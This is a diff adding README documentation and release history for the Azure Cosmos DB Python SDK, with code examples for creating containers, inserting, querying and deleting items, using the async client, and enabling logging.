+When using queries that try to find items based on an **id** value, always make sure you are passing in a string. Azure Cosmos DB only allows string id values; if you use any other data type, this SDK will return no results and no error messages.
+
+## Note on client consistency levels
+
+As of release version 4.3.0b3, if a user does not pass in an explicit consistency level to their client initialization,
+their client will use their database account's default level. Previously, the default was being set to `Session` consistency.
+If for some reason you'd like to keep the old behavior, you can pass the consistency level explicitly during client initialization, as shown:
+```Python
+from azure.cosmos import CosmosClient
+
+import os
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY, consistency_level='Session')
+```
+
+## Limitations
+
+The features below are currently **not supported**. For alternative options, check the **Workarounds** section below.
+
+### Data Plane Limitations:
+
+* Group By queries
+* Queries with COUNT from a DISTINCT subquery: SELECT COUNT (1) FROM (SELECT DISTINCT C.ID FROM C)
+* Bulk/Transactional batch processing
+* Direct TCP Mode access
+* Continuation token for cross-partition queries
+* Change Feed: Processor
+* Change Feed: Read multiple partition key values
+* Change Feed: Read specific time
+* Change Feed: Read from the beginning
+* Change Feed: Pull model
+* Cross-partition ORDER BY for mixed types
+
+### Control Plane Limitations:
+
+* Get CollectionSizeUsage, DatabaseUsage, and DocumentUsage metrics
+* Create Geospatial Index
+* Provision Autoscale DBs or containers
+* Update Autoscale throughput
+* Update analytical store ttl (time to live)
+* Get the connection string
+* Get the minimum RU/s of a container
+
+## Workarounds
+
+### Bulk processing Limitation Workaround
+
+If you want to use the Python SDK to perform bulk inserts to Cosmos DB, the best alternative is to use [stored procedures](https://docs.microsoft.com/azure/cosmos-db/how-to-write-stored-procedures-triggers-udfs) to write multiple items with the same partition key.
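+
+As an illustration, here is a minimal sketch of that workaround. The stored procedure name (`spBulkInsert`) and its JavaScript body are hypothetical examples, not part of this SDK; the `scripts.create_stored_procedure` and `scripts.execute_stored_procedure` calls are the SDK methods used to register and run it. A production stored procedure would also need to check the boolean returned by `createDocument` and resume via continuation, which this sketch omits.
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+container = client.get_database_client('testDatabase').get_container_client('products')
+
+# Hypothetical server-side JavaScript stored procedure that writes a
+# batch of documents sharing a single partition key value.
+sproc_body = {
+    'id': 'spBulkInsert',
+    'body': (
+        'function bulkInsert(docs) {'
+        '  var container = getContext().getCollection();'
+        '  for (var i = 0; i < docs.length; i++) {'
+        '    container.createDocument(container.getSelfLink(), docs[i]);'
+        '  }'
+        '  getContext().getResponse().setBody(docs.length);'
+        '}'
+    )
+}
+container.scripts.create_stored_procedure(body=sproc_body)
+
+# Every document in the batch must use the same partition key value,
+# which is also passed as the partition_key of the execution call.
+docs = [{'id': 'item{0}'.format(i), 'productName': 'Widget'} for i in range(10)]
+inserted = container.scripts.execute_stored_procedure(
+    sproc='spBulkInsert', partition_key='Widget', params=[docs])
+```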
+
+### Control Plane Limitations Workaround
+
+Typically, you can use the [Azure Portal](https://portal.azure.com/), the [Azure Cosmos DB Resource Provider REST API](https://docs.microsoft.com/rest/api/cosmos-db-resource-provider), the [Azure CLI](https://docs.microsoft.com/cli/azure/azure-cli-reference-for-cosmos-db) or [PowerShell](https://docs.microsoft.com/azure/cosmos-db/manage-with-powershell) to perform the control plane operations this SDK does not support.
+
+## Boolean Data Type
+
+While the Python language [uses](https://docs.python.org/3/library/stdtypes.html?highlight=boolean#truth-value-testing) "True" and "False" for boolean types, Cosmos DB [accepts](https://docs.microsoft.com/azure/cosmos-db/sql-query-is-bool) "true" and "false" only. In other words, the Python language uses Boolean values with the first letter uppercase and all other letters lowercase, while Cosmos DB and its SQL language use only lowercase letters for those same Boolean values. The SDK deals with this mismatch as follows:
+
+* JSON documents created with Python must use "True" and "False" to pass the language validation. The SDK converts them to "true" and "false" for you, so "true" and "false" are what will actually be stored in Cosmos DB.
+* If you retrieve those documents with the Cosmos DB Portal's Data Explorer, you will see "true" and "false".
+* If you retrieve those documents with this Python SDK, "true" and "false" values will be automatically converted back to "True" and "False".
+
+## SQL Queries x FROM Clause Subitems
+
+This SDK uses the [query_items](https://docs.microsoft.com/python/api/azure-cosmos/azure.cosmos.containerproxy?preserve-view=true&view=azure-python#query-items-query--parameters-none--partition-key-none--enable-cross-partition-query-none--max-item-count-none--enable-scan-in-query-none--populate-query-metrics-none----kwargs-) method to submit SQL queries to Azure Cosmos DB.
+
+The Cosmos DB SQL language allows you to [get subitems by using the FROM clause](https://docs.microsoft.com/azure/cosmos-db/sql-query-from#get-subitems-by-using-the-from-clause) to reduce the source to a smaller subset. For example, you can use `select * from Families.children` instead of `select * from Families`. Please note that:
+
+* For SQL queries using the `query_items` method, this SDK requires that you specify the `partition_key` or use the `enable_cross_partition_query` flag.
+* If you are getting subitems and specifying the `partition_key`, please make sure that your partition key is included in the subitems, which is often not the case.
+
+## Max Item Count
+
+`max_item_count` is a parameter of the `query_items` method: an integer indicating the maximum number of items to be returned per page. Specify `None` to let the service determine the optimal item count; this is the recommended configuration, and the default behavior of this SDK when the parameter is not set.
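+
+As a minimal sketch (the page size of 10 is an arbitrary example), the pages behind `max_item_count` can be walked explicitly with the `by_page()` iterator on the paged response:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+container = client.get_database_client('testDatabase').get_container_client('products')
+
+# Request at most 10 items per page; max_item_count=None (the default)
+# lets the service determine the optimal item count instead.
+pages = container.query_items(
+    query='SELECT * FROM products p',
+    enable_cross_partition_query=True,
+    max_item_count=10
+).by_page()
+
+for page_number, page in enumerate(pages, start=1):
+    print('Page {0} holds {1} items'.format(page_number, len(list(page))))
+```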
+
+## Examples
+
+The following sections provide several code snippets covering some of the most common Cosmos DB tasks, including:
+
+* [Create a database](#create-a-database "Create a database")
+* [Create a container](#create-a-container "Create a container")
+* [Create an analytical store enabled container](#create-an-analytical-store-enabled-container "Create an analytical store enabled container")
+* [Get an existing container](#get-an-existing-container "Get an existing container")
+* [Insert data](#insert-data "Insert data")
+* [Delete data](#delete-data "Delete data")
+* [Query the database](#query-the-database "Query the database")
+* [Get database properties](#get-database-properties "Get database properties")
+* [Get database and container throughputs](#get-database-and-container-throughputs "Get database and container throughputs")
+* [Modify container properties](#modify-container-properties "Modify container properties")
+* [Using the asynchronous client](#using-the-asynchronous-client "Using the asynchronous client")
+
+### Create a database
+
+After authenticating your [CosmosClient][ref_cosmosclient], you can work with any resource in the account. The code snippet below creates a SQL API database, which is the default when no API is specified in the [create_database][ref_cosmosclient_create_database] call.
+
+```Python
+from azure.cosmos import CosmosClient, exceptions
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+try:
+    database = client.create_database(DATABASE_NAME)
+except exceptions.CosmosResourceExistsError:
+    database = client.get_database_client(DATABASE_NAME)
+```
+
+### Create a container
+
+This example creates a container with default settings. If a container with the same name already exists in the database (generating a `409 Conflict` error), the existing container is obtained instead.
+
+```Python
+from azure.cosmos import CosmosClient, PartitionKey, exceptions
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+
+try:
+    container = database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName"))
+except exceptions.CosmosResourceExistsError:
+    container = database.get_container_client(CONTAINER_NAME)
+except exceptions.CosmosHttpResponseError:
+    raise
+```
+
+### Create an analytical store enabled container
+
+This example creates a container with [Analytical Store](https://docs.microsoft.com/azure/cosmos-db/analytical-store-introduction) enabled, for reporting, BI, AI, and advanced analytics with [Azure Synapse Link](https://docs.microsoft.com/azure/cosmos-db/synapse-link).
+
+The options for `analytical_storage_ttl` are:
+
++ `0` or `None` (or omitted): not enabled.
++ `-1`: the data will be stored indefinitely.
++ Any other number: the actual TTL, in seconds.
+
+
+```Python
+CONTAINER_NAME = 'products'
+try:
+    container = database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName"), analytical_storage_ttl=-1)
+except exceptions.CosmosResourceExistsError:
+    container = database.get_container_client(CONTAINER_NAME)
+except exceptions.CosmosHttpResponseError:
+    raise
+```
+
+The preceding snippets also handle the [CosmosHttpResponseError][ref_httpfailure] exception if the container creation failed.
For more information on error handling and troubleshooting, see the [Troubleshooting](#troubleshooting "Troubleshooting") section.
+
+### Get an existing container
+
+Retrieve an existing container from the database:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+container = database.get_container_client(CONTAINER_NAME)
+```
+
+### Insert data
+
+To insert items into a container, pass a dictionary containing your data to [ContainerProxy.upsert_item][ref_container_upsert_item]. Each item you add to a container must include an `id` key with a value that uniquely identifies the item within the container.
+
+This example inserts several items into the container, each with a unique `id`:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+container = database.get_container_client(CONTAINER_NAME)
+
+for i in range(1, 10):
+    container.upsert_item({
+            'id': 'item{0}'.format(i),
+            'productName': 'Widget',
+            'productModel': 'Model {0}'.format(i)
+        }
+    )
+```
+
+### Delete data
+
+To delete items from a container, use [ContainerProxy.delete_item][ref_container_delete_item]. The SQL API in Cosmos DB does not support the SQL `DELETE` statement.
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+container = database.get_container_client(CONTAINER_NAME)
+
+for item in container.query_items(
+        query='SELECT * FROM products p WHERE p.productModel = "Model 2"',
+        enable_cross_partition_query=True):
+    container.delete_item(item, partition_key='Widget')
+```
+
+> NOTE: If you are using a partitioned collection, the value of the `partition_key` in the example code above should be set to the value of the partition key for this particular item, not the name of the partition key column in your collection. This holds true for both point reads and deletes.
+
+### Query the database
+
+A Cosmos DB SQL API database supports querying the items in a container with [ContainerProxy.query_items][ref_container_query_items] using SQL-like syntax.
+
+This example queries a container for items with a specific `id`:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+container = database.get_container_client(CONTAINER_NAME)
+
+# Enumerate the returned items
+import json
+for item in container.query_items(
+        query='SELECT * FROM mycontainer r WHERE r.id="item3"',
+        enable_cross_partition_query=True):
+    print(json.dumps(item, indent=True))
+```
+
+> NOTE: Although you can specify any value for the container name in the `FROM` clause, we recommend you use the actual container name for consistency.
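+
+As the delete note above mentions, point reads follow the same rule: pass the item's `id` and the partition key *value* to `read_item`. A minimal sketch, reusing the `container` and items from the snippets above:
+
+```Python
+# 'item3' is the item's id; 'Widget' is that item's value for the
+# /productName partition key, not the partition key path itself.
+item = container.read_item(item='item3', partition_key='Widget')
+print(item['productModel'])
+```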
+
+Perform parameterized queries by passing a dictionary containing the parameters and their values to [ContainerProxy.query_items][ref_container_query_items]:
+
+```Python
+discontinued_items = container.query_items(
+    query='SELECT * FROM products p WHERE p.productModel = @model',
+    parameters=[
+        dict(name='@model', value='Model 7')
+    ],
+    enable_cross_partition_query=True
+)
+for item in discontinued_items:
+    print(json.dumps(item, indent=True))
+```
+
+For more information on querying Cosmos DB databases using the SQL API, see [Query Azure Cosmos DB data with SQL queries][cosmos_sql_queries].
+
+### Get database properties
+
+Get and display the properties of a database:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+import json
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+properties = database.read()
+print(json.dumps(properties))
+```
+
+### Get database and container throughputs
+
+Get and display the throughput values of a database and of a container with dedicated throughput:
+
+```Python
+from azure.cosmos import CosmosClient
+import os
+import json
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+
+# Database
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+db_offer = database.read_offer()
+print('Found Offer \'{0}\' for Database \'{1}\' and its throughput is \'{2}\''.format(db_offer.properties['id'], database.id, db_offer.properties['content']['offerThroughput']))
+
+# Container with dedicated throughput only. Returns an "offer not found" error for containers without dedicated throughput.
+CONTAINER_NAME = 'testContainer'
+container = database.get_container_client(CONTAINER_NAME)
+container_offer = container.read_offer()
+print('Found Offer \'{0}\' for Container \'{1}\' and its throughput is \'{2}\''.format(container_offer.properties['id'], container.id, container_offer.properties['content']['offerThroughput']))
+```
+
+
+### Modify container properties
+
+Certain properties of an existing container can be modified. This example sets the default time to live (TTL) for items in the container to 10 seconds:
+
+```Python
+from azure.cosmos import CosmosClient, PartitionKey
+import os
+import json
+
+URL = os.environ['ACCOUNT_URI']
+KEY = os.environ['ACCOUNT_KEY']
+client = CosmosClient(URL, credential=KEY)
+DATABASE_NAME = 'testDatabase'
+database = client.get_database_client(DATABASE_NAME)
+CONTAINER_NAME = 'products'
+container = database.get_container_client(CONTAINER_NAME)
+
+database.replace_container(
+    container,
+    partition_key=PartitionKey(path="/productName"),
+    default_ttl=10,
+)
+# Display the new TTL setting for the container
+container_props = container.read()
+print(json.dumps(container_props['defaultTtl']))
+```
+
+For more information on TTL, see [Time to Live for Azure Cosmos DB data][cosmos_ttl].
+
+### Using the asynchronous client (Preview)
+
+The asynchronous Cosmos client is a separate client that looks and works in a similar fashion to the existing synchronous client. However, the async client needs to be imported separately, and its methods need to be used with the async/await keywords.
+The async client needs to be initialized and closed after usage, which can be done manually or with the use of a context manager. The example below shows how to do so manually.
+ +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +DATABASE_NAME = 'testDatabase' +CONTAINER_NAME = 'products' + +async def create_products(): + client = CosmosClient(URL, credential=KEY) + database = client.get_database_client(DATABASE_NAME) + container = database.get_container_client(CONTAINER_NAME) + for i in range(10): + await container.upsert_item({ + 'id': 'item{0}'.format(i), + 'productName': 'Widget', + 'productModel': 'Model {0}'.format(i) + } + ) + await client.close() # the async client must be closed manually if it's not initialized in a with statement +``` + +Instead of manually opening and closing the client, it is highly recommended to use the `async with` keywords. This creates a context manager that will initialize and later close the client once you're out of the statement. The example below shows how to do so. + +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +DATABASE_NAME = 'testDatabase' +CONTAINER_NAME = 'products' + +async def create_products(): + async with CosmosClient(URL, credential=KEY) as client: # the with statement will automatically initialize and close the async client + database = client.get_database_client(DATABASE_NAME) + container = database.get_container_client(CONTAINER_NAME) + for i in range(10): + await container.upsert_item({ + 'id': 'item{0}'.format(i), + 'productName': 'Widget', + 'productModel': 'Model {0}'.format(i) + } + ) +``` + +### Queries with the asynchronous client (Preview) + +Unlike the synchronous client, the async client does not have an `enable_cross_partition` flag in the request. Queries without a specified partition key value will attempt to do a cross partition query by default. + +Query results can be iterated, but the query's raw output returns an asynchronous iterator. This means that each object from the iterator is an awaitable object, and does not yet contain the true query result. In order to obtain the query results you can use an async for loop, which awaits each result as you iterate on the object, or manually await each query result as you iterate over the asynchronous iterator. + +Since the query results are an asynchronous iterator, they can't be cast into lists directly; instead, if you need to create lists from your results, use an async for loop or Python's list comprehension to populate a list: + +```Python +from azure.cosmos.aio import CosmosClient +import os + +URL = os.environ['ACCOUNT_URI'] +KEY = os.environ['ACCOUNT_KEY'] +client = CosmosClient(URL, credential=KEY) +DATABASE_NAME = 'testDatabase' +database = client.get_database_client(DATABASE_NAME) +CONTAINER_NAME = 'products' +container = database.get_container_client(CONTAINER_NAME) + +async def create_lists(): + results = container.query_items( + query='SELECT * FROM products p WHERE p.productModel = "Model 2"') + + # iterates on "results" iterator to asynchronously create a complete list of the actual query results + + item_list = [] + async for item in results: + item_list.append(item) + + # Asynchronously creates a complete list of the actual query results. This code performs the same action as the for-loop example above. 
+ item_list = [item async for item in results] + await client.close() +``` +## Troubleshooting + +### General + +When you interact with Cosmos DB using the Python SDK, exceptions returned by the service correspond to the same HTTP status codes returned for REST API requests: + +[HTTP Status Codes for Azure Cosmos DB][cosmos_http_status_codes] + +For example, if you try to create a container using an ID (name) that's already in use in your Cosmos DB database, a `409` error is returned, indicating the conflict. In the following snippet, the error is handled gracefully by catching the exception and displaying additional information about the error. + +```Python +try: + database.create_container(id=CONTAINER_NAME, partition_key=PartitionKey(path="/productName")) +except exceptions.CosmosResourceExistsError: + print("""Error creating container +HTTP status code 409: The ID (name) provided for the container is already in use. +The container name must be unique within the database.""") + +``` +### Logging + +This library uses the standard +[logging](https://docs.python.org/3.5/library/logging.html) library for logging. +Basic information about HTTP sessions (URLs, headers, etc.) is logged at INFO +level. + +Detailed DEBUG level logging, including request/response bodies and unredacted +headers, can be enabled on a client with the `logging_enable` argument: +```python +import sys +import logging +from azure.cosmos import CosmosClient + +# Create a logger for the 'azure' SDK +logger = logging.getLogger('azure') +logger.setLevel(logging.DEBUG) + +# Configure a console output +handler = logging.StreamHandler(stream=sys.stdout) +logger.addHandler(handler) + +# This client will log detailed information about its HTTP sessions, at DEBUG level +client = CosmosClient(URL, credential=KEY, logging_enable=True) +``` + +Similarly, `logging_enable` can enable detailed logging for a single operation, +even when it isn't enabled for the client: +```py +database = client.create_database(DATABASE_NAME, logging_enable=True) +``` + +## Next steps + +For more extensive documentation on the Cosmos DB service, see the [Azure Cosmos DB documentation][cosmos_docs] on docs.microsoft.com. 
+ + +[azure_cli]: https://docs.microsoft.com/cli/azure +[azure_portal]: https://portal.azure.com +[azure_sub]: https://azure.microsoft.com/free/ +[cloud_shell]: https://docs.microsoft.com/azure/cloud-shell/overview +[cosmos_account_create]: https://docs.microsoft.com/azure/cosmos-db/how-to-manage-database-account +[cosmos_account]: https://docs.microsoft.com/azure/cosmos-db/account-overview +[cosmos_container]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-containers +[cosmos_database]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-databases +[cosmos_docs]: https://docs.microsoft.com/azure/cosmos-db/ +[cosmos_samples]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples +[cosmos_pypi]: https://pypi.org/project/azure-cosmos/ +[cosmos_http_status_codes]: https://docs.microsoft.com/rest/api/cosmos-db/http-status-codes-for-cosmosdb +[cosmos_item]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items#azure-cosmos-items +[cosmos_request_units]: https://docs.microsoft.com/azure/cosmos-db/request-units +[cosmos_resources]: https://docs.microsoft.com/azure/cosmos-db/databases-containers-items +[cosmos_sql_queries]: https://docs.microsoft.com/azure/cosmos-db/how-to-sql-query +[cosmos_ttl]: https://docs.microsoft.com/azure/cosmos-db/time-to-live +[python]: https://www.python.org/downloads/ +[ref_container_delete_item]: https://aka.ms/azsdk-python-cosmos-ref-delete-item +[ref_container_query_items]: https://aka.ms/azsdk-python-cosmos-ref-query-items +[ref_container_upsert_item]: https://aka.ms/azsdk-python-cosmos-ref-upsert-item +[ref_container]: https://aka.ms/azsdk-python-cosmos-ref-container +[ref_cosmos_sdk]: https://aka.ms/azsdk-python-cosmos-ref +[ref_cosmosclient_create_database]: https://aka.ms/azsdk-python-cosmos-ref-create-database +[ref_cosmosclient]: https://aka.ms/azsdk-python-cosmos-ref-cosmos-client +[ref_database]: https://aka.ms/azsdk-python-cosmos-ref-database +[ref_httpfailure]: https://aka.ms/azsdk-python-cosmos-ref-http-failure +[sample_database_mgmt]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/database_management.py +[sample_document_mgmt]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/document_management.py +[sample_examples_misc]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos/samples/examples.py +[source_code]: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos +[venv]: https://docs.python.org/3/library/venv.html +[virtualenv]: https://virtualenv.pypa.io + +## Contributing + +This project welcomes contributions and suggestions. Most contributions require you to agree to a +Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us +the rights to use your contribution. For details, visit https://cla.microsoft.com. + +When you submit a pull request, a CLA-bot will automatically determine whether you need to provide +a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions +provided by the bot. You will only need to do this once across all repos using our CLA. + +This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). 
+For more information, see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
+contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.
+
+
+## Release History
+
+### 4.3.0 (2022-05-23)
+#### Features Added
+- GA release of Async I/O APIs, including all changes from 4.3.0b1 to 4.3.0b4.
+
+#### Breaking Changes
+- Method signatures have been updated to use keyword arguments instead of positional arguments for most method options in the async client.
+- Bugfix: Automatic Id generation for items was turned on for the `upsert_items()` method when no 'id' value was present in the document body.
+The method call will now require an 'id' field to be present in the document body.
+
+#### Other Changes
+- Deprecated offer-named methods in favor of their new throughput-named counterparts (`read_offer` -> `get_throughput`).
+- Marked the GetAuthorizationHeader method for deprecation since it will no longer be public in a future release.
+- Added samples showing how to configure retry options for both the sync and async clients.
+- Deprecated the `connection_retry_policy` and `retry_options` options in the sync client.
+- Added a user warning to non-query methods trying to use the `populate_query_metrics` option.
+
+### 4.3.0b4 (2022-04-07)
+
+#### Features Added
+- Added support for AAD authentication for the async client.
+- Added support for AAD authentication for the sync client.
+
+#### Other Changes
+- Changed `_set_partition_key` return typehint in async client.
+
+### 4.3.0b3 (2022-03-10)
+
+> [WARNING]
+> The default `Session` consistency bugfix will impact customers whose database accounts have a `Bounded Staleness` or `Strong`
+> consistency level, and were previously not sending `Session` as a consistency_level parameter when initializing
+> their clients.
+> The default consistency level for the sync and async clients is no longer "Session" and will instead be set to the
+> consistency level of the user's Cosmos account setting on initialization if not passed during client initialization.
+> Please see [Consistency Levels in Azure Cosmos DB](https://docs.microsoft.com/azure/cosmos-db/consistency-levels)
+> for more details on consistency levels, or the README section on this change [here](https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/cosmos/azure-cosmos#note-on-client-consistency-levels).
+
+#### Features Added
+- Added a new **provisional** `max_integrated_cache_staleness_in_ms` parameter to the read item and query items APIs in order
+  to make use of the **preview** CosmosDB integrated cache functionality.
+  Please see [Azure Cosmos DB integrated cache](https://docs.microsoft.com/azure/cosmos-db/integrated-cache) for more details.
+- Added support for split-proof queries for the async client.
+
+#### Bugs fixed
+- The default consistency level for the sync and async clients is no longer `Session` and will instead be set to the
+  consistency level of the user's Cosmos account setting on initialization if not passed during client initialization.
+  This change will impact client applications in terms of RUs and latency. Users relying on the default `Session` consistency
+  will need to pass it explicitly if their account consistency is different from `Session`.
+  Please see [Consistency Levels in Azure Cosmos DB](https://docs.microsoft.com/azure/cosmos-db/consistency-levels) for more details.
+- Fixed an invalid request body being sent when passing in the `serverScript` body parameter to replace operations for trigger, sproc and udf resources.
+- Moved `is_system_key` logic in the async client.
+- Fixed TypeErrors not being thrown when passing in invalid connection retry policies to the client.
+
+### 4.3.0b2 (2022-01-25)
+
+This version and all future versions will require Python 3.6+. Python 2.7 is no longer supported.
+We will also be removing support for Python 3.6 and will only support Python 3.7+ starting December 2022.
+
+#### Features Added
+- Added support for split-proof queries for the sync client.
+
+#### Other Changes
+- Added an async user agent for the async client.
+
+### 4.3.0b1 (2021-12-14)
+
+#### Features Added
+- Added a language-native async I/O client.
+
+### 4.2.0 (2020-10-08)
+
+**Bug fixes**
+- Fixed a bug where the continuation token was not honored when query_iterable was used to get results by page. Issue #13265.
+- Fixed a bug where resource tokens were not being honored for document reads and deletes. Issue #13634.
+
+**New features**
+- Added support for passing a partitionKey while querying the change feed. Issue #11689.
+
+### 4.1.0 (2020-08-10)
+
+- Added a deprecation warning for "lazy" indexing mode. The backend no longer allows creating containers with this mode and will set them to consistent instead.
+
+**New features**
+- Added the ability to set the analytical storage TTL when creating a new container.
+
+**Bug fixes**
+- Fixed support for dicts as inputs for get_client APIs.
+- Fixed Python 2/3 compatibility in query iterators.
+- Fixed a type hint error. Issue #12570 - thanks @sl-sandy.
+- Fixed a bug where options headers were not added to the upsert_item function. Issue #11791 - thank you @aalapatirvbd.
+- Fixed the error raised when a non-string ID is used in an item. It now raises TypeError rather than AttributeError. Issue #11793 - thank you @Rabbit994.
+
+
+### 4.0.0 (2020-05-20)
+
+- Stable release.
+- Added HttpLoggingPolicy to the pipeline to enable passing in a custom logger for request and response headers.
+
+
+## 4.0.0b6
+
+- Fixed a bug in synchronized_request for media APIs.
+- Removed MediaReadMode and MediaRequestTimeout from ConnectionPolicy as media requests are not supported.
+
+
+## 4.0.0b5
+
+- The azure.cosmos.errors module has been deprecated and replaced by azure.cosmos.exceptions.
+- The access condition parameters (`access_condition`, `if_match`, `if_none_match`) have been deprecated in favor of separate `match_condition` and `etag` parameters.
+- Fixed a bug in the routing map provider.
+- Added query Distinct, Offset and Limit support.
+- The default document query execution context is now used for:
+  - ChangeFeed queries
+  - single partition queries (partitionkey, partitionKeyRangeId is present in options)
+  - Non-document queries
+- Errors out for aggregates on multiple partitions, with enable cross partition query set to true, but no "value" keyword present.
+- Hits the query plan endpoint for other scenarios to fetch the query plan.
+- Added `__repr__` support for Cosmos entity objects.
+- Updated documentation.
+
+
+## 4.0.0b4
+
+- Added support for a `timeout` keyword argument to all operations to specify an absolute timeout in seconds
+  within which the operation must be completed. If the timeout value is exceeded, a `azure.cosmos.errors.CosmosClientTimeoutError` will be raised.
+- Added a new `ConnectionRetryPolicy` to manage retry behaviour during HTTP connection errors.
+- Added new constructor and per-operation configuration keyword arguments:
+  - `retry_total` - Maximum retry attempts.
+  - `retry_backoff_max` - Maximum retry wait time in seconds.
+  - `retry_fixed_interval` - Fixed retry interval in milliseconds.
+  - `retry_read` - Maximum number of socket read retry attempts.
+  - `retry_connect` - Maximum number of connection error retry attempts.
+  - `retry_status` - Maximum number of retry attempts on error status codes.
+  - `retry_on_status_codes` - A list of specific status codes to retry on.
+  - `retry_backoff_factor` - Factor to calculate wait time between retry attempts.
+
+## 4.0.0b3
+
+- Added `create_database_if_not_exists()` and `create_container_if_not_exists()` methods to CosmosClient and Database respectively.
+
+## 4.0.0b2
+
+Version 4.0.0b2 is the second iteration in our efforts to build a more Pythonic client library.
+
+**Breaking changes**
+
+- The client connection has been adapted to consume the HTTP pipeline defined in `azure.core.pipeline`.
+- Interactive objects have now been renamed as proxies. This includes:
+  - `Database` -> `DatabaseProxy`
+  - `User` -> `UserProxy`
+  - `Container` -> `ContainerProxy`
+  - `Scripts` -> `ScriptsProxy`
+- The constructor of `CosmosClient` has been updated:
+  - The `auth` parameter has been renamed to `credential` and will now take an authentication type directly. This means the master key value, a dictionary of resource tokens, or a list of permissions can be passed in. However, the old dictionary format is still supported.
+  - The `connection_policy` parameter has been made a keyword-only parameter, and while it is still supported, each of the individual attributes of the policy can now be passed in as explicit keyword arguments:
+    - `request_timeout`
+    - `media_request_timeout`
+    - `connection_mode`
+    - `media_read_mode`
+    - `proxy_config`
+    - `enable_endpoint_discovery`
+    - `preferred_locations`
+    - `multiple_write_locations`
+- A new classmethod constructor has been added to `CosmosClient` to enable creation via a connection string retrieved from the Azure portal.
+- Some `read_all` operations have been renamed to `list` operations:
+  - `CosmosClient.read_all_databases` -> `CosmosClient.list_databases`
+  - `Container.read_all_conflicts` -> `ContainerProxy.list_conflicts`
+  - `Database.read_all_containers` -> `DatabaseProxy.list_containers`
+  - `Database.read_all_users` -> `DatabaseProxy.list_users`
+  - `User.read_all_permissions` -> `UserProxy.list_permissions`
+- All operations that took `request_options` or `feed_options` parameters now take them as keyword-only parameters. In addition, while these options dictionaries are still supported, each of the individual options within the dictionary is now supported as an explicit keyword argument.
+- The error hierarchy now inherits from `azure.core.AzureError` instead of `CosmosError`, which has been removed.
+  - `HTTPFailure` has been renamed to `CosmosHttpResponseError`
+  - `JSONParseFailure` has been removed and replaced by `azure.core.DecodeError`
+  - Added additional errors for specific response codes:
+    - `CosmosResourceNotFoundError` for status 404
+    - `CosmosResourceExistsError` for status 409
+    - `CosmosAccessConditionFailedError` for status 412
+- `CosmosClient` can now be run in a context manager to handle closing the client connection.
+- Iterable responses (e.g. query responses and list responses) are now of type `azure.core.paging.ItemPaged`. The method `fetch_next_block` has been replaced by a secondary iterator, accessed by the `by_page` method.
+
+## 4.0.0b1
+
